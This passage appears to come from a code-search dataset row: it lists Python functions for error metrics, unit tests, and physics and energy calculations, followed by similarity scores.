sqrt(self.f * 2 - self.f ** 2)", "def evaluation_error(y_real, y_pred, max_rating, min_rating):\n mae = mean_absolute_error(y_real, y_pred)\n nmae = normalized_mean_absolute_error(y_real, y_pred,\n max_rating, min_rating)\n rmse = root_mean_square_error(y_real, 
y_pred)\n\n return mae, nmae, rmse", "def test_check_conformer_energy(self):\n v_list = [-272.2779012225, -272.2774933703, -272.2768397635, -272.2778432059, -272.278645477, -272.2789602654,\n -272.2788749196, -272.278496709, -272.2779350675, -272.2777008843, -272.2777167286, -272.2780937643,\n -272.2784838846, -272.2788050464, -272.2787865352, -272.2785091607, -272.2779977452, -272.2777957743,\n -272.2779134906, -272.2781827547, -272.278443339, -272.2788244214, -272.2787748749]\n v_list = np.array(v_list, np.float64)\n v_diff = (v_list[0] - np.min(v_list)) * constants.E_h * constants.Na / 1000\n self.assertAlmostEqual(v_diff / 2.7805169838282797, 1, 5)", "def get_R_e_test(E, M, g_e, T_e, R_e, epsilon):\n R_e_test = np.zeros((M,M))\n for i in range(M):\n for j in range(M):\n if i != j:\n R_e_test[i,j] = g_e**2*(E[i] - E[j])/(np.exp((E[i] \n - E[j])/T_e)-1)\n else:\n R_e_test[i,j] = g_e**2 * T_e\n return np.abs(R_e_test - R_e) < epsilon", "def keV(E):\n if np.min(E) >= 100:\n return E / 1000\n else:\n return E", "def get_error(self, params):\n return self.endog - self.predict(params)", "def eci(self):\n return self.__eci", "def error_rate(self):\n\n\t\treturn theano.tensor.mean(theano.tensor.neq(\n\t\t\tself.get_symbolic_predicted_labels(),\n\t\t\tself.symbolic_output))", "def error_calculation_test(self):\n dataOrg = [[1,1], [2,2], [3,3], [4,4], [5,5], [6,6], [7,8], [7.3, 5], [8, 0], [9,10]]\n dataCalc = [[1,3], [2,5], [3,0], [4,3], [5,5], [6.1,6], [7,3], [7.3, 5], [8, 0], [9,9]]\n # abs difference: 2 3 3 1 0 NA 5 0 NA 1\n # local errors: 200 150 200 50 0 NA 125 0 NA 20\n # sum: 745\n\n tsOrg = TimeSeries.from_twodim_list(dataOrg)\n tsCalc = TimeSeries.from_twodim_list(dataCalc)\n\n wmape = WeightedMeanAbsolutePercentageError()\n wmape.initialize(tsOrg, tsCalc)\n assert str(wmape.get_error())[:6] == \"93.125\"", "def estimate_accuracy(yEv, yEv_calc, disp = False):\n\n\tr_sqr = metrics.r2_score( yEv, yEv_calc)\n\tRMSE = np.sqrt( metrics.mean_squared_error( yEv, yEv_calc))\n\tMAE = metrics.mean_absolute_error( yEv, yEv_calc)\n\tDAE = metrics.median_absolute_error( yEv, yEv_calc)\n\n\tif disp:\n\t\tprint(\"r^2={0:.2e}, RMSE={1:.2e}, MAE={2:.2e}, DAE={3:.2e}\".format( r_sqr, RMSE, MAE, DAE))\n\n\treturn r_sqr, RMSE, MAE, DAE", "def erf(t):\n P = 0.3275911\n A = [0.254829592, -0.284496736, 1.421413741, -1.453152027, 1.061405429]\n T = 1.0 / (1 + P * t)\n Tn = T\n Poly = A[0] * Tn\n for i in range(1, 5):\n Tn = Tn * T\n Poly = Poly * A[i] * Tn\n return 1.0 - Poly * np.exp(-t * t)", "def B_res_e(f_ece, harm = 1.):\n return me/eV2J*f_ece*np.pi*2./harm", "def test_rr_se(results):\n truese = np.asarray([2.09826858, 30.60745128, 108.51947421, 0.95693751,\n 0.6564318])\n test_se = results.params_se()\n assert test_se == pytest.approx(truese)", "def calc_error_dist(self):\n pass", "def get_deltaE(self):\n return self.deltaE" ]
[ "0.6688616", "0.6576088", "0.6453312", "0.6436712", "0.6268617", "0.61915094", "0.60727984", "0.60624784", "0.6055529", "0.5957637", "0.5948924", "0.5935441", "0.59333384", "0.5899245", "0.5894991", "0.5884183", "0.5884183", "0.5883016", "0.5870002", "0.5867805", "0.58296996", "0.58256584", "0.5806175", "0.5805928", "0.5803038", "0.5796278", "0.57854205", "0.57710433", "0.5754452", "0.5753451", "0.5747029", "0.57426095", "0.5742036", "0.57251817", "0.5707274", "0.57006305", "0.5694029", "0.56927836", "0.5681012", "0.5664438", "0.56557095", "0.56531703", "0.5649919", "0.56457955", "0.5641291", "0.5625754", "0.5624976", "0.5624714", "0.5620939", "0.56174374", "0.5616939", "0.5610984", "0.56067747", "0.5603147", "0.55961365", "0.5594472", "0.5593996", "0.5593026", "0.5592446", "0.5584533", "0.5579173", "0.5578676", "0.5578064", "0.5572537", "0.5561491", "0.55601424", "0.55594176", "0.5553619", "0.553965", "0.55382764", "0.5537258", "0.552812", "0.55208635", "0.55208635", "0.5518403", "0.55179673", "0.5515055", "0.5510486", "0.5509502", "0.5506086", "0.55057645", "0.55053663", "0.55025256", "0.55017126", "0.5500882", "0.54932296", "0.54819643", "0.5481476", "0.54799813", "0.54792184", "0.5472846", "0.5469635", "0.5468635", "0.5462949", "0.5461399", "0.54491204", "0.5448523", "0.5445566", "0.5444299", "0.5437646" ]
0.55544835
67
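The document in the row above computes the Equal Error Rate by root-finding on an interpolated ROC curve (roc_curve from scikit-learn, brentq and interp1d from SciPy); note that np.float in its return statement has been removed from recent NumPy releases, so the sketch below uses the built-in float. The snippet is a hedged, self-contained sketch that is not part of the dataset: it approximates the EER without root-finding by taking the ROC point where |FNR - FPR| is smallest, mirroring the FAR/FRR-crossing idea of the compute_EER negative above. The synthetic labels and scores and the helper name eer_from_scores are assumptions for illustration.

import numpy as np
from sklearn.metrics import roc_curve

def eer_from_scores(y_true, y_score, pos_label=1):
    # ROC gives false-positive and true-positive rates per threshold
    fpr, tpr, thresholds = roc_curve(y_true, y_score, pos_label=pos_label)
    fnr = 1.0 - tpr                              # false-negative rate
    idx = int(np.nanargmin(np.abs(fnr - fpr)))   # operating point where FNR ~= FPR
    eer = (fpr[idx] + fnr[idx]) / 2.0            # average the two rates at that point
    return eer, float(thresholds[idx])

if __name__ == "__main__":
    rng = np.random.default_rng(0)
    y = np.array([0] * 200 + [1] * 200)                    # synthetic labels (assumption)
    scores = np.concatenate([rng.normal(0.4, 0.15, 200),   # impostor scores (assumption)
                             rng.normal(0.6, 0.15, 200)])  # genuine scores (assumption)
    eer, thresh = eer_from_scores(y, scores)
    print(f"EER ~ {eer:.3f} at threshold {thresh:.3f}")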